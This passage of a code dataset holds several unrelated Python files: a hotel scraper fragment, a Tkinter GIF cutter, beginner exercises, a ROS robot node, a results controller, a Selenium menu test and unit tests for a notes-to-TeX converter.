row.find('div', {'class':'hotelCardListing__imgCardWrapper'})\n images = imageSection.find_all('img')\n nonlz = False\n img_links = []\n for img in 
images:\n src = img['src']\n if 'lazy' not in src:\n img_links.append(src)\n nonlz = True\n # print(img_links)\n info['imgs'] = img_links\n # print(nonlz)\n if nonlz:\n description = row.find('div', {'class':'listingHotelDescription'})\n metas = description.find_all('meta')\n for meta in metas:\n # print(meta['itemprop'],':',meta['content'])\n info[meta['itemprop']] = meta['content']\n nametag = row.find('h3')\n info['name'] = nametag.text\n # print(nametag)\n address = row.find('span',{'class':'u-line--clamp-2'})\n info['address'] = address.text\n am_list = row.find_all('div',{'class':'amenityWrapper__amenity'})\n amenities = []\n for amenity in am_list:\n amenities.append(amenity.find('span').text.strip())\n info['amenities'] = amenities[:-1]\n if 'ratingValue' not in info:\n info['ratingValue'] = 'NEW'\n discounted,og = info['priceRange'].split('-')\n #print(discounted, og)\n discounted = discounted.strip()\n og = og.strip()\n # print(discounted[1:], og[1:])\n if int(discounted[1:]) < int(og[1:]):\n info['price'] = discounted\n info['old'] = og\n else:\n info['price'] = og\n # print(info['price'])\n dtr = requests.get(info['url'])\n dtsoup = BeautifulSoup(dtr.text, 'html.parser')\n desctag = dtsoup.find('div',{'class':'c-u43rea'})\n if desctag:\n loc = desctag.text.find('Special Features')\n info['description'] = desctag.text[8:loc].strip()\n # print(info['description'])\n policies_ul = dtsoup.find('ul',{'class':'c-f0mxva'})\n if policies_ul:\n policies_li = policies_ul.find_all('li')\n policies = []\n for p in policies_li[1:]:\n policies.append(p.text)\n info['policies'] = policies\n print(info['policies'])\n hotel_list.append(info)\n if hotels > 0 and pgno < 4:\n pgno += 1\n else:\n break\n return hotel_list\n\n# ans = find_hotels('mumbai','07-12-2019','10-12-2019','2',['1','2'])\n# print(len(ans))\n# for a in ans:\n# print(a['id'])","sub_path":"hotels_scrape.py","file_name":"hotels_scrape.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150512033","text":"import Pmw\nfrom tkinter import *\nfrom PIL import Image, ImageTk, ImageSequence\nfrom tkinter import filedialog\nfrom tkinter.filedialog import askopenfilename, askdirectory\nimport threading\nimport os\n\nventana = Pmw.initialise(fontScheme = 'pmw1')\nventana.title(\"GIF CUTTER\")\nventana.configure(bg=\"LightBlue3\")\n_start = (0,0)\n_end=\"\"\nsize=\"\"\narchivo_selec = \"\"\nim = \"\"\nver = False\ncanvas = \"\"\n\ndef inicia_conv():\n if im!=\"\":\n t3 = threading.Thread(target=convertir)\n t3.start()\n\ndef convertir():\n nombrea,ex=os.path.splitext(((archivo_selec).split(\"/\"))[-1])\n if ex=='.webp':\n nom=nombrea+'(CONV).gif'\n im.save(nom,'gif',save_all=True,background=0)\n else:\n nom=nombrea+'(CONV).webp'\n im.save(nom,'webp',save_all=True)\n display.appendtext('Creado archivo: '+nom+'\\n')\n\ndef verify():\n global ver\n ver = True\n top.destroy()\n display.appendtext(\"EFECTUADO RECORTE\\n\")\n\ndef delete_rectangle(event):\n canvas.delete(\"rectangle\")\n crop_btn.config(state=\"disabled\")\n\ndef _on_click(event):\n global _start\n global _end\n global canvas\n \n _start = (canvas.canvasx(event.x), canvas.canvasy(event.y))\n _end = None\n crop_btn.config(state=\"normal\")\n\ndef _draw_rectangle():\n global canvas\n global _end\n global _start\n\n canvas.delete(\"rectangle\")\n\n if _end is None or _start is None: \n return None\n\n x0, y0 = _start\n x1, y1 = _end\n \n\n canvas.create_rectangle(x0, y0, x1, y1, 
fill=\"#18c194\",\n                            width=1, stipple=\"gray50\", tags='rectangle'\n                            )\n    \ndef _on_drag(event):\n    global _start\n    global _end\n    global canvas\n\n    x0, y0 = _start\n    ex, ey = canvas.canvasx(event.x), canvas.canvasy(event.y)\n    _end = (ex, ey)\n    _draw_rectangle()\n\ndef clear():\n    global archivo_selec, im, ver\n    display.delete('1.0',END)\n    texto_inicio()\n    archivo_selec=\"\"\n    im=\"\"\n    ver = False\n\ndef recorte():\n    global canvas\n    root = Tk()\n    canv = Canvas(root, width=500, height=375, bg='white')\n    canv.grid(row=0, column=0)\n    img = ImageTk.PhotoImage(archivo_selec)\n    canv.create_image(0, 0, anchor=NW, image=img)\n    canv.pack(side=\"left\")\n    \n    root.mainloop()\n\ndef direc():\n    directorio=filedialog.askdirectory()\n    if directorio!=\"\":\n        os.chdir(directorio)\n        display.appendtext(f\"Dir: {os.getcwd()}\"+\"\\n\")\n\ndef iniciar_extract():\n    if archivo_selec!=\"\" and im!=\"\":\n        t=threading.Thread(target=corta)\n        t.start()\n    else:\n        display.appendtext(\"\\nSELECCIONE UN ARCHIVO\\n\")\n\ndef _on_drop(event):\n    global _start\n    global _end\n    global im\n\n    if not _end is None:\n        \n        # Clamp the selection bounds to the image\n        img_x, img_y = im.size\n\n        x0, y0 = _start\n        x0 = img_x if x0 > img_x else 0 if x0 < 0 else x0\n        y0 = img_y if y0 > img_y else 0 if y0 < 0 else y0 \n        _start = (x0, y0)\n\n        x1, y1 = _end\n        x1 = img_x if x1 > img_x else 0 if x1 < 0 else x1\n        y1 = img_y if y1 > img_y else 0 if y1 < 0 else y1 \n        _end = (x1, y1)\n\n        # Normalize to obtain the top-left and bottom-right corners\n        if x0 > x1:\n            if y0 < y1: # _start is the top-right corner\n                _start = (x1, y0)\n                _end = (x0, y1)\n            else: # _start is the bottom-right corner\n                _start, _end = _end, _start\n        else:\n            if y0 > y1: # _start is the bottom-left corner\n                _start = (x0, y1)\n                _end = (x1, y0)\n\n        # Redraw the rectangle\n        _draw_rectangle()\n\ndef recorte():\n    global canvas, crop_btn, top\n    if archivo_selec!=\"\":\n        top = Toplevel()\n        canvas = Canvas(top,width=size[0],height=size[1],background='black')\n        canvas.pack(padx=0,pady=0)\n        archi = ImageTk.PhotoImage(Image.open(archivo_selec))\n        canvas.create_image(0,0,image=archi,anchor=NW)\n        canvas.bind('<Button-1>',_on_click)\n        canvas.bind(\"<B1-Motion>\", _on_drag)\n        canvas.bind('<Button-3>',delete_rectangle)\n        canvas.bind(\"<ButtonRelease-1>\", _on_drop, '+')\n        crop_btn = Button(top, text=\"Recortar imagen\", state=\"disabled\", bg=\"light green\",command=verify)\n        crop_btn.pack(side=\"bottom\",expand=1, fill=X)\n        top.mainloop()\n    else:\n        display.appendtext(\"PULSE \\'BUSCAR\\' PARA SELECCIONAR UN ARCHIVO\\n\")\n\ndef name_file(cr,c,n):\n    if cr == True:\n        nf = n+\"_crop \"+str(count)+\".png\"\n    else:\n        nf = n+\" \"+str(count)+\".png\"\n    return nf\n\ndef corta():\n    global _start, _end, ver, count\n    if ver == True:\n        box = (_start+_end)\n        cropped = True\n    else:\n        box = ((0,0)+size)\n        cropped = False\n    print(box)\n    display.delete('1.0',END)\n    display.appendtext(\"\\nPROCESO EN CURSO\\n\")\n    count=1\n    archivo=(((archivo_selec).split(\"/\"))[-1])\n    try:\n        name,ex = os.path.splitext(archivo)\n        for frame in ImageSequence.Iterator(im):\n            nom_imagen=name_file(cropped,count,name)\n            c_im=im.crop(box)\n            c_im.save(nom_imagen)\n            display.appendtext(\"\\nExtraido frame: \"+nom_imagen)\n            count+=1\n        display.appendtext(\"\\n\\nPROCESO FINALIZADO :D\\n\")\n    \n    except:\n        display.appendtext(\"\\nHUBO UN PROBLEMA AL REALIZAR LA OPERACIÓN\")\n    ver = False\n    \ndef busca():\n    global archivo_selec\n    global im, size, archivo\n    global _end, ver\n    archivo_selec = askopenfilename(parent=ventana, initialdir=\"M:/\",title='Elegir 
archivo.')\n    archivo=(((archivo_selec).split(\"/\"))[-1])\n    if archivo_selec!=\"\":\n        try:\n            im=Image.open(archivo_selec)\n            size=(im.size)\n            display.appendtext(\"Archivo seleccionado: \"+(((archivo_selec).split(\"/\"))[-1])+\"\\n\")\n        except:\n            archivo_selec = \"\"\n            display.appendtext(\"NO SE PUDO ABRIR EL ARCHIVO\\n\")\n\n    \ndef texto_inicio():\n    display.appendtext(\"_____________________________\\n\")\n    display.appendtext(\"|       |\\n\")\n    display.appendtext(\"|   --GIF CUTTER--  |\\n\")\n    display.appendtext(\"|___________________________|\\n\")\n    display.appendtext(\"\\n\")\n    display.appendtext(\"Pulse \\'BUSCAR\\' para escoger archivo.\\nPulse \\'CARPETA\\' para escoger carpeta de destino.\\n\\n\")\n\ndisplay = Pmw.ScrolledText(ventana, hscrollmode='none',\n                           vscrollmode='dynamic', hull_relief='sunken',\n                           hull_background='gray20', hull_borderwidth=10,\n                           text_background='blue', text_width=73,\n                           text_foreground='green2', text_height=22,\n                           text_padx=10, text_pady=10, text_relief='groove',\n                           text_font=('Fixedsys', 10))\ndisplay.pack(padx=0,pady=0)\n\nbuttons = Pmw.ButtonBox(ventana,hull_background=\"LightBlue3\")\n\nbuttons.pack(fill='both', expand=1, padx=1, pady=1)\n\nbuttons.add('LIMPIAR',bg='light green',command=clear)\nbuttons.add('CARPETA',bg='light green',command=direc)\nbuttons.add('CONVERTIR',bg='light green',command=inicia_conv)\nbuttons.add('EXTRAER',bg='light green',command=iniciar_extract)\nbuttons.add('BUSCAR',bg='light green',command=busca)\nbuttons.add('RECORTAR',bg='light green',command=recorte)\n\nbuttons.alignbuttons()\n\ntexto_inicio()\n\nventana.mainloop()\n\n\n\n\n","sub_path":"GIF_Cutter3.1.py","file_name":"GIF_Cutter3.1.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17053292","text":"# Write a program to approve a bank loan for the purchase of a house.\n# Ask for the price of the house, the buyer's salary and over how many years it will be paid.\n# The monthly installment cannot exceed 30% of the salary, otherwise the loan is denied.\n\ncasa = float(input('Qual o valor da casa? R$'))\nsalario = float(input('Qual o seu salário? R$'))\nanos = int(input('Em quantos anos deseja pagar? '))\nparcela = casa / (anos*12)\nminimo = (salario*30) / 100\nprint('Uma casa de R${:.2f} parcelada em {} anos ficará em torno de R${:.2f} por mes e seu salario de R${:.2f}'.format(casa, anos, parcela, salario))\nif parcela <= minimo:\n    print('Aprovado!Parabens seu emprestimo foi aprovado')\nelse:\n    print('NEGADO! 
Não sera possivel fazer o emprestimo.')","sub_path":"Parte 2/curso_python_2/Desafios de aula/desafio 36.py","file_name":"desafio 36.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"455961542","text":"#\n# Copyright (C) 2018-2022 S[&]T, The Netherlands.\n#\n\nfrom __future__ import absolute_import, division, print_function\n\nimport datetime\n\nNAIVE_DATE_FORMATS = [\n '%Y-%m-%d',\n '%Y%m%d',\n]\n\nNAIVE_DATETIME_FORMATS = [\n '%Y-%m-%dT%H:%M:%S.%f', '%Y-%m-%dT%H:%M:%S',\n '%Y%m%dT%H%M%S.%f', '%Y%m%dT%H%M%S',\n] + NAIVE_DATE_FORMATS\n\n\ndef parse_date(value):\n result = None\n for fmt in NAIVE_DATE_FORMATS:\n try:\n result = datetime.datetime.strptime(value, fmt).date()\n except:\n continue\n if result:\n break\n return result\n\n\ndef parse_datetime(value):\n result = None\n for fmt in NAIVE_DATETIME_FORMATS:\n try:\n result = datetime.datetime.strptime(value, fmt)\n except:\n continue\n if result:\n break\n return result\n","sub_path":"muninn_django/naiveutcdatetime/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"532082146","text":"#!/usr/bin/env python\nimport rospy\nfrom lab2.msg import balboaLL # import balboa message\nfrom lab2.msg import pid_input # import pid_input message\n\nPI = 3.14159265358979 # global variable for PI\n\ndef parse_balboa_msg(data, self):\n self.dist_current = data.encoderCountRight # unpack right encoder\n self.dist_target = rospy.get_param('distance/target') # get distance target from user\n self.dist_current = self.dist_current * self.DPC # convert encoder distance to mm\n\n self.ang_current = data.angleX # unpack angle X\n self.ang_target = rospy.get_param('angle/target') # get angle target from user\n self.ang_current = self.ang_current / 1000 # convert angle from millidegrees to degrees\n\n # Publish the current and target distance values\n self.dist_pid_input.source = 'distance'\n self.dist_pid_input.current = self.dist_current\n self.dist_pid_input.target = self.dist_target\n self.dist.publish(self.dist_pid_input)\n\n # Publish the current and target angle values\n self.ang_pid_input.source = 'angle'\n self.ang_pid_input.current = self.ang_current\n self.ang_pid_input.target = self.ang_target\n self.ang.publish(self.ang_pid_input)\n\nclass TheNode(object):\n # This class holds the rospy logic for sending pid_input messages\n # from a published balboa message and user input \n\n def __init__(self):\n\n rospy.init_node('remote_drive') # intialize node\n \n # initialize publisher node for distance PID controller\n self.dist = rospy.Publisher('/dist', pid_input, queue_size=10)\n\n self.dist_pid_input = pid_input() # default pid_input type\n self.dist_current = 0 # init current distance\n self.dist_target = rospy.get_param('distance/target') # init distance target\n\n # initialize publisher node for angle PID controller\n self.ang = rospy.Publisher('/ang', pid_input, queue_size=10)\n\n self.ang_pid_input = pid_input() # default pid_input type\n self.ang_current = 0 # init left angle\n self.ang_target = rospy.get_param('angle/target') # init angle target\n\n # Encoder count per revolution is gear motor ratio (3344/65)\n # times gearbox ratio (2.14/1) times encoder revolution (12/1)\n CPR = (3344 / 65) * 2.14 * 12\n\n # Distance per revolution is 2 PI times wheel radius (40 mm)\n distPR = 2*PI*40\n\n # Distance per encoder count is 
distPR / CPR\n self.DPC = distPR / CPR\n\n def main_loop(self):\n # initialize subscriber node for messages from balboa robot\n rospy.Subscriber('balboaLL', balboaLL, parse_balboa_msg, self)\n\n rospy.spin() # wait for messages\n\nif __name__ == '__main__':\n try:\n a = TheNode()\n a.main_loop()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/controlled_drive.py","file_name":"controlled_drive.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"51478238","text":"\"\"\"Controls result list model and view.\"\"\"\n\nimport pickle\n\nfrom deltacompression.gui.views import chart_view\n\n\nclass ResultController(object):\n \"\"\"Controller responsible for updating results' model and view.\"\"\"\n def __init__(self, main_controller, panel, result_list):\n \"\"\"Creates ResultController object.\n\n Args:\n main_controller: instance of MainController.\n panel: instance of ResultPanel.\n result_list: list of ExperimentResult objects.\n \"\"\"\n self._main_controller = main_controller\n self._result_list = result_list\n self._panel = panel\n self._initSignals()\n self._ser_errors = (pickle.PickleError, AttributeError, EOFError,\n ImportError, IndexError, IOError)\n\n def _initSignals(self):\n self._panel.Bind(self._panel.EVT_ANALYSE, self._onAnalyseExperiments)\n self._panel.Bind(self._panel.EVT_LOAD, self._onLoadFile)\n self._panel.Bind(self._panel.EVT_SAVE, self._onSaveFile)\n\n def _checkValidity(self, results):\n if not results:\n return False\n ver = [n for n, _ in results[0].versions_with_results]\n for res in results:\n res_ver = [n for n, _ in res.versions_with_results]\n if ver != res_ver:\n return False\n return True\n\n def _getResults(self):\n checked = self._panel.getCheckedIndices()\n results = [self._result_list[i] for i in checked]\n return results\n\n def _onAnalyseExperiments(self, _):\n results = self._getResults()\n if not self._checkValidity(results):\n self._panel.onIncorrectItems()\n return\n\n chart = chart_view.BarChartView(results)\n chart.show()\n\n def _onLoadFile(self, _):\n path = self._panel.getPath()\n try:\n with open(path, \"r\") as fil:\n new_results = pickle.load(fil)\n for res in new_results:\n self._addResult(res)\n except self._ser_errors:\n self._panel.onLoadError()\n\n def _onSaveFile(self, _):\n path = self._panel.getPath()\n results = self._getResults()\n try:\n with open(path, \"w\") as fil:\n pickle.dump(results, fil)\n except self._ser_errors:\n self._panel.onSaveError()\n\n def _addResult(self, exp_result):\n self._panel.addResultToList(exp_result)\n self._result_list.append(exp_result)\n\n def onExperimentPerformed(self, exp_result):\n self._addResult(exp_result)\n","sub_path":"deltacompression/gui/controllers/result_controller.py","file_name":"result_controller.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"420289187","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom 
selenium.webdriver.chrome.options import Options\nimport unittest, time, re, datetime\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nfrom pathlib import Path # python3 only\nenv_path = '.env'\nload_dotenv(dotenv_path=env_path)\nfrom time import sleep\n\nclass Test_Category(unittest.TestCase):\n    def setUp(self):\n        self.driver = webdriver.Chrome()\n        self.verificationErrors = []\n        self.accept_next_alert = True\n    \n    def test_category_woman(self):\n\n        driver = self.driver\n\n        get_url = os.getenv(\"URL\")\n\n        self.driver.get(get_url)\n        time.sleep(5)\n        element = WebDriverWait(driver, 5).until(\n            EC.presence_of_element_located((By.XPATH, \"//img[@class='logo img-responsive']\"))\n        )\n        driver.fullscreen_window()\n\n        print(\"Show URL Successfully\")\n\n        hover_women = driver.find_element_by_xpath(\"//a[@title='Women']\")\n        \n        hover = ActionChains(driver).move_to_element(hover_women)\n        hover.perform()\n        time.sleep(5)\n        print(\"success to redirect tab women\")\n\n        hover_blouse = driver.find_element_by_xpath(\"/html[1]/body[1]/div[1]/div[1]/header[1]/div[3]/div[1]/div[1]/div[6]/ul[1]/li[1]/ul[1]\")\n        blouse = driver.find_element_by_xpath(\"/html[1]/body[1]/div[1]/div[1]/header[1]/div[3]/div[1]/div[1]/div[6]/ul[1]/li[1]/ul[1]/li[1]/ul[1]/li[2]/a[1]\")\n        blouse.click()\n\n        time.sleep(3)\n\n        text_category_blouse = driver.find_element_by_xpath(\"//span[@class='category-name']\")\n\n        if text_category_blouse.text == 'Blouses':\n            print(\"success detect\")\n        else:\n            print(\"not detected\")\n        \n        time.sleep(3)\n        \n\n    def is_element_present(self, how, what):\n        try: self.driver.find_element(by=how, value=what)\n        except NoSuchElementException as e: return False\n        return True\n    \n    def is_alert_present(self):\n        try: self.driver.switch_to.alert\n        except NoAlertPresentException as e: return False\n        return True\n    \n    def close_alert_and_get_its_text(self):\n        try:\n            alert = self.driver.switch_to.alert\n            alert_text = alert.text\n            if self.accept_next_alert:\n                alert.accept()\n            else:\n                alert.dismiss()\n            return alert_text\n        finally: self.accept_next_alert = True\n\n\n    def tearDown(self):\n        self.driver.quit()\n        self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n    unittest.main()\n    ","sub_path":"test_category_woman.py","file_name":"test_category_woman.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"3136287","text":"'''\r\nGenerate the first 20 Fibonacci numbers\r\n\r\nversion:0.1\r\nauthor:233-wang-233\r\n'''\r\n# import array as np\r\n# a=0\r\n# b=1\r\n# for i in range(1,20):\r\n#     a,b=b,a+b  # the right-hand side a, a+b builds a tuple; the left-hand a, b are then bound to its first and second elements\r\n#     print(a)\r\n'''\r\nFind the perfect numbers below 10000\r\n\r\nversion:0.1\r\nauthor:233-wang-233\r\n'''\r\nimport math\r\n\r\n# for i in range(2,10000):\r\n#     num = 0\r\n#     for j in range(1,i-1):\r\n#         m=i%j\r\n#         if m==0:\r\n#             num+=j\r\n#     if num==i:\r\n#         print(i)\r\n\r\n\r\n# import math\r\n#\r\n# for num in range(1, 10000):\r\n#     result = 0\r\n#     for factor in range(1, int(math.sqrt(num)) + 1):\r\n#         if num % factor == 0:\r\n#             result += factor\r\n#             if factor > 1 and num // factor != factor:\r\n#                 result += num // factor\r\n#     if result == num:\r\n#         print(num)\r\n\r\n'''\r\nPrint the primes below 100\r\n\r\nversion:0.1\r\nauthor:233-wang-233\r\n'''\r\n# note: 1 is not prime, so the search starts at 2\r\nfor i in range(2,100):\r\n    is_prime=True\r\n    for j in range(2,int(math.sqrt(i))+1):\r\n        if i%j==0:\r\n            is_prime=False\r\n            break\r\n    if is_prime:\r\n        
print(i)\r\n","sub_path":"day3_test.py","file_name":"day3_test.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"269032765","text":"import unittest\nimport collections\n\nimport utils\nimport lineproc\nimport parser\nimport texgenerator\n\nimport constants as const\n\nclass TestUtils(unittest.TestCase):\n    \"\"\"\n    Utils is just a file containing a bunch of\n    useful functions used in other files.\n\n    \"\"\"\n\n    def test_count_lchar(self):\n        self.assertEqual(utils.count_lchar(\"t\", \"testing\"), 1)\n        self.assertEqual(utils.count_lchar(\" \", \"   second\"), 3)\n        self.assertEqual(utils.count_lchar(\" \", \"nothing\"), 0)\n\n    def test_is_prefix(self):\n        self.assertEqual(utils.is_prefix(\"t\", \"testing\"), True)\n        self.assertEqual(utils.is_prefix(\" \", \" second\"), True)\n        self.assertEqual(utils.is_prefix(\" \", \"nothing\"), False)\n        self.assertEqual(utils.is_prefix(\"\", \"\"), True)\n        self.assertEqual(utils.is_prefix(\"test\", \"\"), False)\n\n    def test_rm_prefix(self):\n        self.assertEqual(utils.rm_prefix(\"t\", \"testing\"), \"esting\")\n        self.assertEqual(utils.rm_prefix(\" \", \"  second\"), \" second\")\n        self.assertEqual(utils.rm_prefix(\"\", \"\"), \"\")\n\n        with self.assertRaises(SystemExit):\n            utils.rm_prefix(\".txt\", \"testing\")\n\n    def test_is_suffix(self):\n        self.assertEqual(utils.is_suffix(\".png\", \"file.png\"), True)\n        self.assertEqual(utils.is_suffix(\".jpg\", \"another.jpg\"), True)\n        self.assertEqual(utils.is_suffix(\".txt\", \"testing\"), False)\n        self.assertEqual(utils.is_suffix(\"\", \"testing\"), True)\n\n    def test_rm_suffix(self):\n        self.assertEqual(utils.rm_suffix(\".png\", \"file.png\"), \"file\")\n        self.assertEqual(utils.rm_suffix(\".jpg\", \"another.jpg\"), \"another\")\n        self.assertEqual(utils.rm_suffix(\"ing\", \"testing\"), \"test\")\n        self.assertEqual(utils.rm_suffix(\"\", \"testing\"), \"testing\")\n\n        with self.assertRaises(SystemExit):\n            utils.rm_suffix(\".txt\", \"testing\")\n\n    def test_reverse_string(self):\n        self.assertEqual(utils.reverse_string(\"file.png\"), \"gnp.elif\")\n        self.assertEqual(utils.reverse_string(\"\"), \"\")\n        self.assertEqual(utils.reverse_string(\" \"), \" \")\n\n    def test_intersperse(self):\n        self.assertEqual(utils.intersperse(\" \", \"str\"), \\\n                ['s', ' ', 't', ' ', 'r'])\n        self.assertEqual(utils.intersperse(2, [10, 12, 14]), \\\n                [10, 2, 12, 2, 14])\n\n    def test_flatten(self):\n        self.assertEqual(utils.flatten(['s', 't', 'r']), \"str\")\n        self.assertEqual(utils.flatten([1, 2, 3]), 6)\n\n    def test_find_m(self):\n        self.assertEqual(utils.find_m(\".abc\", \"1. test\"), 1)\n        self.assertEqual(utils.find_m(\"1\", \"1. test\"), 0)\n        self.assertEqual(utils.find_m(\"se\", \"1. test\"), 4)\n\nclass TestLineProc(unittest.TestCase):\n    \"\"\"\n    LineProc is a very cohesive class and file. It\n    could all be done with just one method in a class\n    but it's split up in different functions to help\n    organize it. It does not follow good OOP principles.\n\n    But that's okay because it solves a tricky but\n    fairly small problem. 
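A minimal black-box sketch of that surface, reusing the LineProc(delims) construction from setUp() below; the bold delimiters and the {\bf ...} output form are taken from test_bold:

import lineproc
import constants as const

proc = lineproc.LineProc(const.delims.copy())
bstr, bend = const.delims[const.ID_BOLD]
# A single whole-line assertion exercises delimiter matching and TeX
# escaping together, without reaching into LineProc internals.
assert proc.make_line("a " + bstr + "bold" + bend + " word", 0) == "a {\\bf bold} word"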
This means that although each\n part in LineProc is difficult to test, it's fairly\n easy to test it as one big piece.\n\n \"\"\"\n\n def setUp(self):\n self.delims = const.delims.copy()\n\n line_maker = lineproc.LineProc(self.delims)\n self.make_line = line_maker.make_line\n\n def test_bold(self):\n bstr, bend = self.delims[const.ID_BOLD]\n\n tst1 = \"The third \"+bstr+\"word\"+bend+\" was bold.\"\n res1 = \"The third {\\\\bf word} was bold.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = \"This $ has \"+bstr+\"two bold\"+bend+\" & words.\"\n res2 = \"This \\\\$ has {\\\\bf two bold} \\\\& words.\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n def test_inline_math(self):\n mstr, mend = self.delims[const.ID_M_INL]\n\n tst1 = \"Let's have some math: \"+mstr+\"x + y = 3\"+mend+\".\"\n res1 = \"Let's have some math: $x + y = 3$.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = \"Slightly more complicated: \"+mstr+\"x_{t}\\\\frac{1}{x}\"+mend+\".\"\n res2 = \"Slightly more complicated: $x_{t}\\\\frac{1}{x}$.\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n def test_inline_verbatim(self):\n vstr, vend = self.delims[const.ID_V_INL]\n\n tst1 = \"Some verbatim now: \"+vstr+\"self.assertEqual\"+vend+\".\"\n res1 = \"Some verbatim now: \\\\verb;self.assertEqual;.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = \"Some special # } characters \"+vstr+\"\\\\code #\"+vend+\".\"\n res2 = \"Some special \\\\# \\\\} characters \\\\verb;\\\\code #;.\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n tst3 = \"Let's try some \"+vstr+\"\\\\ $\"+vend+\".\"\n res3 = \"Let's try some \\\\verb;\\\\ $;.\"\n self.assertEqual(self.make_line(tst3, 0), res3)\n\n def test_url(self):\n ustr, uend = self.delims[const.ID_URL]\n sep = self.delims[const.ID_SEPR]\n\n tst1 = \"A link to \"+ustr+\"Google \"+sep+\"http://google.ca\"+uend+\".\"\n res1 = \"A link to \\\\href{http://google.ca}{Google}.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n def test_raw_tex(self):\n rstr, rend = self.delims[const.ID_T_INL]\n\n tst1 = \"Let's have _ some raw tex: \"+rstr+\"\\\\bf{text}\"+rend+\".\"\n res1 = \"Let's have \\\\_ some raw tex: \\\\bf{text}.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n def test_missing(self):\n ustr, _ = self.delims[const.ID_URL]\n rstr, _ = self.delims[const.ID_T_INL]\n\n with self.assertRaises(SystemExit):\n tst1 = \"A link to \"+ustr+\"Google \"\n self.make_line(tst1, 0)\n\n tst2 = \"Let's have some raw tex: \"+rstr+\"\\\\bf{text}\"\n self.make_line(tst2, 0)\n\n def test_mixed(self):\n bstr, bend = self.delims[const.ID_BOLD]\n rstr, rend = self.delims[const.ID_T_INL]\n\n tst1 = bstr+\"Bold\"+bend+rstr+\"$ = $\"+rend+\"end.\"\n res1 = \"{\\\\bf Bold}$ = $end.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = rstr+\"$x + y = 5$\"+rend+bstr+\"sum\"+bend\n res2 = \"$x + y = 5${\\\\bf sum}\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n with self.assertRaises(SystemExit):\n tst3 = bstr+\"Bold\"+rstr+\"$ = $\"+rend+\"end.\"\n self.make_line(tst3, 0)\n\n tst4 = rstr+\"$x + y = 5$\"+rend+bstr+\"\\\\sum\"\n self.make_line(tst4, 0)\n\n def test_replacements(self):\n tst1 = \"This has all \\\\ the restricted tex { } $ symbols \" + \\\n \"& littered # % every_where\"\n res1 = \"This has all \\\\\\\\ the restricted tex \\\\{ \\\\} \\\\$ symbols \" + \\\n \"\\\\& littered \\\\# \\\\% every\\\\_where\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\nclass TestParse(unittest.TestCase):\n \"\"\"\n NotParse is a 
complicated class. It\n reads in the entire .not file and turns\n it into a key, value list that can be\n written as .tex later.\n\n Some parts of NotParse are fairly cohesive\n and can't be tested separately but most\n of it is testable.\n\n \"\"\"\n\n def setUp(self):\n self.delims = const.delims.copy()\n self.parser = parser.Parse(\"Test\", test_mode=True)\n\n def test_get_header(self):\n sep = self.delims[const.ID_SEPR]\n\n # Basic settings test.\n tst1 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_AUT+\"=Test\\n\", \\\n const.ID_HDR_DAT+\"=\\n\", \\\n \"\\n\"]\n\n res1 = [[(const.ID_HDR_TIT, \"Testing Headers\"), \\\n (const.ID_HDR_AUT, \"Test\"), \\\n (const.ID_HDR_DAT, \"\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._get_header(), res1)\n\n\n # Test cutoff lines.\n tst2 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_AUT+\"=Test\"+sep+\"\\n\", \\\n \"Bob\"+sep+\"\\n\", \\\n \"Tom\"+sep+\"\\n\", \\\n \"Lop\\n\", \\\n \"\\n\"]\n\n res2 = [[(const.ID_HDR_TIT, \"Testing Headers\"), \\\n (const.ID_HDR_AUT, \"Test\\nBob\\nTom\\nLop\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._get_header(), res2)\n\n\n tst3 = [\"\\n\", \\\n const.ID_HDR_TIT+\"=Testing Empty Lines\\n\", \\\n \"\\n\"]\n\n res3 = [[(const.ID_HDR_TIT, \"Testing Empty Lines\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.assertEqual(self.parser._get_header(), res3)\n\n with self.assertRaises(SystemExit):\n tst4 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", 